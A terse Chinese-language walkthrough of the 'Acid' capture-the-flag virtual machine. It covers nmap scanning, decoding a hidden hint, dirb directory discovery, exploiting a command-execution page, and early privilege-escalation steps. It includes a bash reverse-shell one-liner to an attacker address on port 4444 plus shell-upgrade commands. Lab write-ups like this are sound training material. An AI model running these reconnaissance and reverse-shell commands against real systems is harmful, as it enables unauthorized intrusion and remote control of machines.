Acid
1.信息收集
nmap -sP 192.168.14.0/24
nmap -p- -sV 192.168.14.187
F12看源码,发现html最后有一行奇怪的编码
0x643239334c6d70775a773d3d
得到了wow.jpg的提示,url直接访问没有发现
dirb http://192.168.14.187:33447
37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34
7aee0f6d588ed9905ee37f16a7c610d4
扫描5个目录cake.php, error.php, hacked.php, index.php, include.php
http://192.168.14.187:33447/Challenge/MagicBox/command.php访问后发现存在命令执行漏洞
2.漏洞利用
bash -c "bash -i >& /dev/tcp/192.168.14.183/4444 0>&1"
3.提权
find / -user acid 2>/dev/null
python3 -m http.server 1111
wget http://192.168.14.187:1111/hint.pcapng
python -c 'import pty;pty.spawn("/bin/bash")'